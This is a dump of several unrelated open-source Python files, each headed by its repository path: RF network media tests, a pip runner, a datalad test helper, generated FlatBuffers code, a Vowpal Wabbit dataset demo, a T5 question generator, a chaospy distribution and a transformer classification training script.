test ability to create a Media from scalar quantities for gamma/z0
and change frequency resolution
"""
a = DefinedGammaZ0 (Frequency(1,10,101),gamma=1j,z0 = 50)
self.assertEqual(a.line(1),a.line(1))
# we should be able to re-sample the media
a.npoints = 21
self.assertEqual(len(a.gamma), len(a))
self.assertEqual(len(a.z0), len(a))
self.assertEqual(len(a.z0), len(a))
def test_vector_gamma_z0_media(self):
"""
test ability to create a Media from vector quantities for gamma/z0
"""
freq = Frequency(1,10,101)
a = DefinedGammaZ0(freq,
gamma = 1j*npy.ones(len(freq)) ,
z0 = 50*npy.ones(len(freq)),
)
self.assertEqual(a.line(1),a.line(1))
with self.assertRaises(NotImplementedError):
a.npoints=4
def test_write_csv(self):
fname = os.path.join(self.files_dir,\
'out.csv')
self.dummy_media.write_csv(fname)
os.remove(fname)
def test_from_csv(self):
fname = os.path.join(self.files_dir,\
'out.csv')
self.dummy_media.write_csv(fname)
a_media = DefinedGammaZ0.from_csv(fname)
self.assertEqual(a_media,self.dummy_media)
os.remove(fname)
class STwoPortsNetworkTestCase(unittest.TestCase):
"""
Check that S parameters of media base elements versus theoretical results.
"""
def setUp(self):
self.dummy_media = DefinedGammaZ0(
frequency=Frequency(1, 100, 21, 'GHz'),
gamma=1j,
z0=50,
)
def test_s_series_element(self):
"""
Series elements of impedance Z:
○---[Z]---○
○---------○
have S matrix of the form:
[ Z/Z0 / (Z/Z0 + 2) 2/(Z/Z0 + 2) ]
[ 2/(Z/Z0 + 2) Z/Z0 / (Z/Z0 + 2) ]
"""
R = 1.0 # Ohm
ntw = self.dummy_media.resistor(R)
Z0 = self.dummy_media.z0
S11 = (R/Z0) / (R/Z0 + 2)
S21 = 2 / (R/Z0 + 2)
npy.testing.assert_array_almost_equal(ntw.s[:,0,0], S11)
npy.testing.assert_array_almost_equal(ntw.s[:,0,1], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,0], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,1], S11)
def test_s_shunt_element(self):
"""
Shunt elements of admittance Y:
○---------○
|
[Y]
|
○---------○
have S matrix of the form:
[ -Y Z0 / (Y Z0 + 2) 2/(Y Z0 + 2) ]
[ 2/(Y Z0 + 2) Z/Z0 / (Y Z0 + 2) ]
"""
R = 1.0 # Ohm
ntw = self.dummy_media.shunt(self.dummy_media.resistor(R)**self.dummy_media.short())
Z0 = self.dummy_media.z0
S11 = -(1/R*Z0) / (1/R*Z0 + 2)
S21 = 2 / (1/R*Z0 + 2)
npy.testing.assert_array_almost_equal(ntw.s[:,0,0], S11)
npy.testing.assert_array_almost_equal(ntw.s[:,0,1], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,0], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,1], S11)
def test_s_lossless_line(self):
"""
Lossless transmission line of characteristic impedance z1, length l
and wavenumber beta
_______
○----- -----○
z0 z1 z0
○-----_______-----○
"""
l = 5.0
z1 = 30.0
z0 = self.dummy_media.z0
ntw = self.dummy_media.line(d=0, unit='m', z0=z0) \
** self.dummy_media.line(d=l, unit='m', z0=z1) \
** self.dummy_media.line(d=0, unit='m', z0=z0)
beta = self.dummy_media.beta
_z1 = z1/z0
S11 = 1j*(_z1**2 - 1)*npy.sin(beta*l) / \
(2*_z1*npy.cos(beta*l) + 1j*(_z1**2 + 1)*npy.sin(beta*l))
S21 = 2*_z1 / \
(2*_z1*npy.cos(beta*l) + 1j*(_z1**2 + 1)*npy.sin(beta*l))
npy.testing.assert_array_almost_equal(ntw.s[:,0,0], S11)
npy.testing.assert_array_almost_equal(ntw.s[:,0,1], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,0], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,1], S11)
def test_s_lossy_line(self):
"""
Lossy transmission line of characteristic impedance Z0, length l
and propagation constant gamma = alpha + j beta
○---------○
○---------○
has ABCD matrix of the form:
[ cosh(gamma l) Z0 sinh(gamma l) ]
[ 1/Z0 sinh(gamma l) cosh(gamma l) ]
"""
class ABCDTwoPortsNetworkTestCase(unittest.TestCase):
"""
Check that ABCD parameters of media base elements (such as lumped elements)
versus theoretical results.
"""
def setUp(self):
self.dummy_media = DefinedGammaZ0(
frequency=Frequency(1, 100, 21,'GHz'),
gamma=1j,
z0=50 ,
)
def test_abcd_series_element(self):
"""
Series elements of impedance Z:
○---[Z]---○
○---------○
have ABCD matrix of the form:
[ 1 Z ]
[ 0 1 ]
"""
R = 1.0 # Ohm
ntw = self.dummy_media.resistor(R)
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], 1.0)
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], R)
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 0.0)
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], 1.0)
def test_abcd_shunt_element(self):
"""
Shunt elements of admittance Y:
○---------○
|
[Y]
|
○---------○
have ABCD matrix of the form:
[ 1 0 ]
[ Y 1 ]
"""
R = 1.0 # Ohm
ntw = self.dummy_media.shunt(self.dummy_media.resistor(R)**self.dummy_media.short())
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], 1.0)
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], 0.0)
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 1.0/R)
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], 1.0)
def test_abcd_series_shunt_elements(self):
"""
Series and Shunt elements of impedance Zs and Zp:
○---[Zs]--------○
|
[Zp]
|
○--------------○
have ABCD matrix of the form:
[ 1 + Zs/Zp Zs ]
[ 1/Zp 1 ]
"""
Rs = 2.0
Rp = 3.0
serie_resistor = self.dummy_media.resistor(Rs)
shunt_resistor = self.dummy_media.shunt(self.dummy_media.resistor(Rp) ** self.dummy_media.short())
ntw = serie_resistor ** shunt_resistor
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], 1.0+Rs/Rp)
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], Rs)
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 1.0/Rp)
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], 1.0)
def test_abcd_thru(self):
"""
Thru has ABCD matrix of the form:
[ 1 0 ]
[ 0 1 ]
"""
ntw = self.dummy_media.thru()
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], 1.0)
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], 0.0)
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 0.0)
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], 1.0)
def test_abcd_lossless_line(self):
"""
Lossless transmission line of characteristic impedance Z0, length l
and wavenumber beta
○---------○
○---------○
has ABCD matrix of the form:
[ cos(beta l) j Z0 sin(beta l) ]
[ j/Z0 sin(beta l) cos(beta l) ]
"""
l = 5
z0 = 80
ntw = self.dummy_media.line(d=l, unit='m', z0=z0)
beta = self.dummy_media.beta
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], npy.cos(beta*l))
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], 1j*z0*npy.sin(beta*l))
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 1j/z0*npy.sin(beta*l))
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], npy.cos(beta*l))
def test_abcd_lossy_line(self):
"""
Lossy transmission line of characteristic impedance Z0, length l
and propagation constant gamma = alpha + j beta
○---------○
○---------○
has ABCD matrix of the form:
[ cosh(gamma l) Z0 sinh(gamma l) ]
[ 1/Z0 sinh(gamma l) cosh(gamma l) ]
"""
l = 5.0
z0 = 30.0
alpha = 0.5
beta = 2.0
lossy_media = DefinedGammaZ0(
frequency=Frequency(1, 100, 21, 'GHz'),
gamma=alpha + 1j*beta,
z0=z0
)
ntw = lossy_media.line(d=l, unit='m', z0=z0)
gamma = lossy_media.gamma
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], npy.cosh(gamma*l))
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], z0*npy.sinh(gamma*l))
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 1.0/z0*npy.sinh(gamma*l))
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], npy.cosh(gamma*l))
|
docs/docs_env/Lib/site-packages/pip-1.0-py2.5.egg/pip/runner.py | gilsonbp/Django-facebook | 10,056 | 12745543 | import sys
import os
def run():
base = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
## FIXME: this is kind of crude; if we could create a fake pip
## module, then exec into it and update pip.__path__ properly, we
## wouldn't have to update sys.path:
sys.path.insert(0, base)
import pip
return pip.main()
if __name__ == '__main__':
exit = run()
if exit:
sys.exit(exit)
|
datalad/downloaders/tests/utils.py | ypid/datalad | 298 | 12745552 | # emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Downloader tests helper utils"""
from unittest import SkipTest
from datalad.downloaders.providers import Providers
def get_test_providers(url=None, reload=False):
"""Return reusable instance of our global providers + verify credentials for url"""
_test_providers = Providers.from_config_files(reload=reload)
if url is not None:
# check if we have credentials for the url
provider = _test_providers.get_provider(url, only_nondefault=True)
if provider is None or provider.credential is None:
# no registered provider, or no credential needed,must be all kosher to access
pass
elif not provider.credential.is_known:
raise SkipTest("This test requires known credentials for %s" % provider.credential.name)
return _test_providers
get_test_providers.__test__ = False
|
service/generated_flatbuffers/tflite/TensorMap.py | lcrh/falken | 213 | 12745604 | <gh_stars>100-1000
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class TensorMap(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsTensorMap(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = TensorMap()
x.Init(buf, n + offset)
return x
@classmethod
def TensorMapBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)
# TensorMap
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# TensorMap
def Name(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.String(o + self._tab.Pos)
return None
# TensorMap
def TensorIndex(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint32Flags, o + self._tab.Pos)
return 0
def TensorMapStart(builder): builder.StartObject(2)
def TensorMapAddName(builder, name): builder.PrependUOffsetTRelativeSlot(0, flatbuffers.number_types.UOffsetTFlags.py_type(name), 0)
def TensorMapAddTensorIndex(builder, tensorIndex): builder.PrependUint32Slot(1, tensorIndex, 0)
def TensorMapEnd(builder): return builder.EndObject()
class TensorMapT(object):
# TensorMapT
def __init__(self):
self.name = None # type: str
self.tensorIndex = 0 # type: int
@classmethod
def InitFromBuf(cls, buf, pos):
tensorMap = TensorMap()
tensorMap.Init(buf, pos)
return cls.InitFromObj(tensorMap)
@classmethod
def InitFromObj(cls, tensorMap):
x = TensorMapT()
x._UnPack(tensorMap)
return x
# TensorMapT
def _UnPack(self, tensorMap):
if tensorMap is None:
return
self.name = tensorMap.Name()
self.tensorIndex = tensorMap.TensorIndex()
# TensorMapT
def Pack(self, builder):
if self.name is not None:
name = builder.CreateString(self.name)
TensorMapStart(builder)
if self.name is not None:
TensorMapAddName(builder, name)
TensorMapAddTensorIndex(builder, self.tensorIndex)
tensorMap = TensorMapEnd(builder)
return tensorMap
|
conftest.py | aperrin66/DAPPER | 225 | 12745621 | """Configures pytest (beyond the ini file)."""
import matplotlib as mpl
import numpy
import pytest
from matplotlib import pyplot as plt
from dapper.dpr_config import rc
@pytest.fixture(autouse=True)
def add_sci(doctest_namespace):
"""Add numpy as np for doctests."""
doctest_namespace["np"] = numpy
doctest_namespace["mpl"] = mpl
doctest_namespace["plt"] = plt
doctest_namespace["rnd"] = numpy.random
doctest_namespace["rc"] = rc
|
demo/memory_tree/xml_amazoncat_13K_script.py | Ark-kun/vowpal_wabbit | 4,332 | 12745624 | import os
import time
import numpy as np
# from IPython import embed
print("perform experiments on amazoncat 13K (multilabel)")
leaf_example_multiplier = 2
lr = 1
bits = 30
alpha = 0.1 # 0.3
passes = 4
learn_at_leaf = True
use_oas = True
# num_queries = 1 #does not really use
dream_at_update = 1
# hal_version = 1 #does not really use
loss = "squared"
dream_repeats = 3
# Precision_at_K = 5
num_examples = 1186239
max_num_labels = 13330
tree_node = int(
num_examples / (np.log(num_examples) / np.log(2) * leaf_example_multiplier)
)
train_data = "amazoncat_train.mat.mult_label.vw.txt"
test_data = "amazoncat_test.mat.mult_label.vw.txt"
if os.path.exists(train_data) is not True:
os.system("wget http://kalman.ml.cmu.edu/wen_datasets/{}".format(train_data))
if os.path.exists(test_data) is not True:
os.system("wget http://kalman.ml.cmu.edu/wen_datasets/{}".format(test_data))
saved_model = "{}.vw".format(train_data)
print("## Training...")
start = time.time()
# train_data = 'tmp_rcv1x.vw.txt'
command_line = f"../../build/vowpalwabbit/vw -d {train_data} --memory_tree {tree_node} {'--learn_at_leaf' if learn_at_leaf else ''} --dream_at_update {dream_at_update}\
--max_number_of_labels {max_num_labels} --dream_repeats {dream_repeats} {'--oas' if use_oas else ''} \
--leaf_example_multiplier {leaf_example_multiplier} --alpha {alpha} -l {lr} -b {bits} -c --passes {passes} --loss_function {loss} --holdout_off -f {saved_model}"
os.system(command_line)
train_time = time.time() - start
print("## Testing...")
start = time.time()
os.system(
"../../build/vowpalwabbit/vw {} --oas {} -i {}".format(
test_data, use_oas, saved_model
)
)
test_time = time.time() - start
print("## train time {}, and test time {}".format(train_time, test_time))
|
Contrastive_Supervision_Synthesis/scripts/model.py | vishalbelsare/OpenMatch | 403 | 12745700 | import os
import math
import torch
from torch import nn, optim
import logging
import numpy as np
import torch.nn.functional as F
from torch.autograd import Variable
import utils
from contrastqg import (T5ForConditionalGeneration)
logger = logging.getLogger()
class QGenerator(object):
def __init__(self, args, tokenizer):
self.network = T5ForConditionalGeneration.from_pretrained(args.pretrain_generator_type)
self.network.resize_token_embeddings(len(tokenizer))
self.network.load_state_dict(torch.load(args.generator_load_dir + '/models.pkl'))
logger.info("sccuess load checkpoint from {} !".format(args.generator_load_dir))
self.tokenizer = tokenizer
self.batchify_inputs = utils.select_gen_input_refactor(args)
def predict(self, inputs):
self.network.eval()
outputs = self.network.generate(**inputs)
pred_tokens = self.tokenizer.convert_outputs_to_tokens(outputs)
return pred_tokens
def set_device(self, device):
self.device = device
self.network.to(self.device)
def parallelize(self):
"""Use data parallel to copy the model across several gpus.
This will take all gpus visible with CUDA_VISIBLE_DEVICES.
"""
self.parallel = True
self.network = torch.nn.DataParallel(self.network) |
chaospy/distributions/collection/bradford.py | utsekaj42/chaospy | 333 | 12745714 | <reponame>utsekaj42/chaospy
"""Bradford distribution."""
import numpy
from ..baseclass import SimpleDistribution, LowerUpperDistribution
class bradford(SimpleDistribution):
"""Standard Bradford distribution."""
def __init__(self, c=1):
super(bradford, self).__init__(dict(c=c))
def _pdf(self, x, c):
return c/(c*x+1.)/numpy.log(1.+c)
def _cdf(self, x, c):
return numpy.log(1.+c*x)/numpy.log(c+1.)
def _ppf(self, q, c):
return ((1.+c)**q-1)/c
def _lower(self, c):
return 0.
def _upper(self, c):
return 1.
class Bradford(LowerUpperDistribution):
"""
Bradford distribution.
Args:
shape (float, Distribution):
Shape parameter
lower (float, Distribution):
Location of lower threshold
upper (float, Distribution):
Location of upper threshold
Examples:
>>> distribution = chaospy.Bradford(0.8, 4, 6)
>>> distribution
Bradford(0.8, lower=4, upper=6)
>>> uloc = numpy.linspace(0, 1, 6)
>>> uloc
array([0. , 0.2, 0.4, 0.6, 0.8, 1. ])
>>> xloc = distribution.inv(uloc)
>>> xloc.round(3)
array([4. , 4.312, 4.663, 5.057, 5.501, 6. ])
>>> numpy.allclose(distribution.fwd(xloc), uloc)
True
>>> distribution.pdf(xloc).round(3)
array([0.681, 0.605, 0.538, 0.478, 0.425, 0.378])
>>> distribution.sample(4).round(3)
array([5.171, 4.175, 5.87 , 4.819])
"""
def __init__(self, shape=1, lower=0, upper=1):
super(Bradford, self).__init__(
dist=bradford(shape),
lower=lower,
upper=upper,
repr_args=[shape],
)
|
axcell/models/structure/transfo_experiment.py | Kabongosalomon/axcell | 335 | 12745718 | <reponame>Kabongosalomon/axcell<filename>axcell/models/structure/transfo_experiment.py<gh_stars>100-1000
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import time
from .experiment import Experiment
from .nbsvm import preds_for_cell_content, preds_for_cell_content_max, preds_for_cell_content_multi
import dataclasses
from dataclasses import dataclass
from typing import Tuple
from axcell.helpers.training import set_seed
from fastai.text import *
import numpy as np
from pathlib import Path
import json
import argparse
import glob
import logging
import os
import random
import numpy as np
import torch
from torch.utils.data import (DataLoader, RandomSampler, SequentialSampler,
TensorDataset)
from torch.utils.data.distributed import DistributedSampler
from fastai.text import * # for utilty functions
try:
from torch.utils.tensorboard import SummaryWriter
except:
from tensorboardX import SummaryWriter
from tqdm import tqdm, trange
import tensorflow_datasets
from transformers import (WEIGHTS_NAME, BertConfig,
BertForSequenceClassification, BertTokenizer,
RobertaConfig,
RobertaForSequenceClassification,
RobertaTokenizer,
XLMConfig, XLMForSequenceClassification,
XLMTokenizer, XLNetConfig,
XLNetForSequenceClassification,
XLNetTokenizer,
DistilBertConfig,
DistilBertForSequenceClassification,
DistilBertTokenizer, DataProcessor, InputExample, AutoConfig)
from transformers import AdamW, WarmupLinearSchedule
from transformers import glue_compute_metrics as compute_metrics
from transformers import glue_output_modes as output_modes
from transformers import glue_processors as processors
from transformers import glue_convert_examples_to_features as convert_examples_to_features
from transformers import AutoTokenizer, AutoModelForSequenceClassification, glue_convert_examples_to_features
from transformers.data.processors.glue import glue_processors
logger = logging.getLogger(__name__)
def train(args, train_dataset, valid_dataset, model, tokenizer):
""" Train the model """
if args.local_rank in [-1, 0]:
tb_writer = args.get_summary_writer()
train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1
else:
t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ['bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': args.weight_decay},
{'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.warmup_steps, t_total=t_total)
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
model, optimizer = amp.initialize(model, optimizer, opt_level=args.fp16_opt_level)
# multi-gpu training (should be after apex fp16 initialization)
if args.n_gpu > 1:
model = torch.nn.DataParallel(model)
# Distributed training (should be after apex fp16 initialization)
if args.local_rank != -1:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.local_rank],
output_device=args.local_rank,
find_unused_parameters=True)
# Train!
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size)
logger.info(" Total train batch size (w. parallel, distributed & accumulation) = %d",
args.train_batch_size * args.gradient_accumulation_steps * (torch.distributed.get_world_size() if args.local_rank != -1 else 1))
logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
logger.info(" Total optimization steps = %d", t_total)
global_step = 0
tr_loss, logging_loss = 0.0, 0.0
model.zero_grad()
train_iterator = range(int(args.num_train_epochs))
set_seed(args.seed, "Training", all_gpus=(args.n_gpu > 1)) # Added here for reproductibility (even between python 2 and 3)
mb = master_bar(train_iterator)
mb.first_bar.comment = f'Epochs'
results={}
for epoch in mb:
epoch_iterator = progress_bar(train_dataloader, display=args.local_rank not in [-1, 0], parent=mb)
for step, batch in enumerate(epoch_iterator):
model.train()
batch = tuple(t.to(args.device) for t in batch)
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[3]}
if args.model_type != 'distilbert':
inputs['token_type_ids'] = batch[2] if args.model_type in ['bert', 'xlnet'] else None # XLM, DistilBERT and RoBERTa don't use segment_ids
outputs = model(**inputs)
loss = outputs[0] # model outputs are always tuple in transformers (see doc)
if args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel training
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
tr_loss += loss.item()
if (step + 1) % args.gradient_accumulation_steps == 0 and not args.tpu:
if args.fp16:
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args.max_grad_norm)
else:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
model.zero_grad()
global_step += 1
if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:
# Log metrics
mb.child.comment = f"loss: {loss}"
tb_writer.add_scalar('train/lr', scheduler.get_lr()[0], global_step)
tb_writer.add_scalar('train/loss', (tr_loss - logging_loss)/args.logging_steps, global_step)
logging_loss = tr_loss
if args.local_rank in [-1, 0] and args.save_steps > 0 and global_step % args.save_steps == 0:
# Save model checkpoint
output_dir = os.path.join(args.output_dir, 'checkpoint-{}'.format(global_step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
model_to_save = model.module if hasattr(model, 'module') else model # Take care of distributed/parallel training
model_to_save.save_pretrained(output_dir)
torch.save(args, os.path.join(output_dir, 'training_args.bin'))
logger.info("Saving model checkpoint to %s", output_dir)
#mb.first_bar.comment = f'first bar stat'
#mb.write(f'Finished loop {i}.')
if args.tpu:
args.xla_model.optimizer_step(optimizer, barrier=True)
model.zero_grad()
global_step += 1
if args.max_steps > 0 and global_step > args.max_steps:
epoch_iterator.close()
break
if args.local_rank == -1 and args.evaluate_during_training: # Only evaluate when single GPU otherwise metrics may not average well
results = evaluate(args, model, valid_dataset)
for key, value in results.items():
tb_writer.add_scalar('eval/{}'.format(key), value, global_step)
mb.first_bar.comment = str(results['acc'])
mb.write(f"Epoch: {epoch} {loss} Accuracy: {results.get('acc', 0)}")
if args.max_steps > 0 and global_step > args.max_steps:
train_iterator.close()
break
hparams_dict = {k: v for k, v in dataclasses.asdict(args).items() if isinstance(v, (int, float, str, bool,))}
tb_writer.add_hparams(hparam_dict=hparams_dict, metric_dict=results)
if args.local_rank in [-1, 0]:
tb_writer.close()
return global_step, tr_loss / global_step
def evaluate(args, model, eval_dataset, prefix="", eval_output_dir="/tmp/out"):
# Loop to handle MNLI double evaluation (matched, mis-matched)
results = {}
eval_task = args.task_name
if not os.path.exists(eval_output_dir) and args.local_rank in [-1, 0]:
os.makedirs(eval_output_dir)
args.eval_batch_size = args.per_gpu_eval_batch_size * max(1, args.n_gpu)
# Note that DistributedSampler samples randomly
eval_sampler = SequentialSampler(eval_dataset) if args.local_rank == -1 else DistributedSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
# Eval!
logger.info("***** Running evaluation {} *****".format(prefix))
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
preds = None
out_label_ids = None
mb = progress_bar(eval_dataloader)
for batch in mb:
model.eval()
batch = tuple(t.to(args.device) for t in batch)
with torch.no_grad():
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[3]}
if args.model_type != 'distilbert':
inputs['token_type_ids'] = batch[2] if args.model_type in ['bert', 'xlnet'] else None # XLM, DistilBERT and RoBERTa don't use segment_ids
outputs = model(**inputs)
tmp_eval_loss, logits = outputs[:2]
eval_loss += tmp_eval_loss.mean().item()
nb_eval_steps += 1
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs['labels'].detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(out_label_ids, inputs['labels'].detach().cpu().numpy(), axis=0)
eval_loss = eval_loss / nb_eval_steps
if args.output_mode == "classification":
preds = np.argmax(preds, axis=1)
elif args.output_mode == "regression":
preds = np.squeeze(preds)
result = compute_metrics(eval_task, preds, out_label_ids)
results.update(result)
results['loss'] = eval_loss
output_eval_file = os.path.join(eval_output_dir, prefix, "eval_results.txt")
with open(output_eval_file, "w") as writer:
logger.info("***** Eval results {} *****".format(prefix))
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
return results
def prepare_glue_examples(tokenizer, task_name='mrpc', split_name='train'):
processor = glue_processors[task_name]()
def tf_mrpc_to_pytorch(d):
for ex in d:
ex = processor.get_example_from_tensor_dict(ex)
# ex = processor.tfds_map(ex)
yield ex
tf_data = tensorflow_datasets.load(f"glue/{task_name}")[split_name]
examples = tf_mrpc_to_pytorch(tf_data)
features = glue_convert_examples_to_features(examples,
tokenizer,
max_length=128,
task='mrpc')
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)
all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)
all_labels = torch.tensor([f.label for f in features], dtype=torch.long)
dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels)
return dataset
def strip_tensors(r):
nr = {}
for k,v in r.items():
v = v.numpy()
if isinstance(v, bytes):
v = v.decode("utf-8")
else:
v = v.item()
nr[k] = v
return nr
def glue_dataset_to_df(task_name):
data = tensorflow_datasets.load(f"glue/{task_name}")
new_dict = {}
for name, dataset in data.items():
new_dict[name] = pd.DataFrame.from_records([strip_tensors(r) for r in dataset],
columns=dataset.output_shapes.keys(),
index='idx')
return new_dict.get('train', None), new_dict.get('validation', None), new_dict.get('test', None)
def convert_df_to_examples(df, text_a='sentence1', text_b='sentence2', label='label'):
return [InputExample(
idx,
row[text_a],
row[text_b],
str(row[label]))
for idx, row in df.iterrows()]
def convert_df_to_dataset(tokenizer, df, max_length=128, task='mrpc', text_a='sentence1', text_b='sentence2', label='label', return_labels=False):
label_list = list(sorted(map(str, df[label].unique())))
examples = convert_df_to_examples(df, text_a, text_b, label)
features = glue_convert_examples_to_features(examples,
tokenizer,
max_length=max_length,
label_list=label_list,
output_mode='classification',
task=None)
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)
all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)
all_labels = torch.tensor([f.label for f in features], dtype=torch.long)
dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels)
if return_labels:
return dataset, label_list
return dataset
@dataclass
class TransfoLearner():
model: nn.Module
tokenizer: Any
data: Any
def get_preds(args, model, dataset, ordered=True):
eval_dataset = dataset
eval_sampler = SequentialSampler(eval_dataset) if args.local_rank == -1 else DistributedSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
if isinstance(eval_sampler, DistributedSampler) and ordered:
# Note that DistributedSampler samples randomly
raise ValueError("Unable to run distributed get_preds with ordered == True")
logger.info("Num examples = %d", len(eval_dataset))
logger.info("Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
mb = progress_bar(eval_dataloader)
preds = []
labels = []
try:
with torch.no_grad():
model.to(args.device)
model.eval()
for batch in mb:
batch = tuple(t.to(args.device) for t in batch)
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[3]}
if args.model_type != 'distilbert':
inputs['token_type_ids'] = batch[2] if args.model_type in ['bert', 'xlnet'] else None
# XLM, DistilBERT and RoBERTa don't use segment_ids
outputs = model(**inputs)
tmp_eval_loss, logits = outputs[:2]
eval_loss += tmp_eval_loss.mean().item()
nb_eval_steps += 1
preds.append(logits.detach().cpu())
labels.append(inputs['labels'].detach().cpu()) # add non_blocking=True but somehow it isn't avaliabe in our torch
return torch.cat(preds, dim=0), torch.cat(labels, dim=0)
finally:
model.to("cpu")
@dataclass
class TransfoDatabunch():
num_labels: int
train_ds: Any
valid_ds: Any
test_ds: Any
@dataclass
class TransfoExperiment(Experiment):
test_split: str = None
valid_split: str = None
text_a: str = 'text'
text_b: str = 'cell_content'
label: str = 'label'
#@help("Model type selected in the list: ...")
model_type: str = None
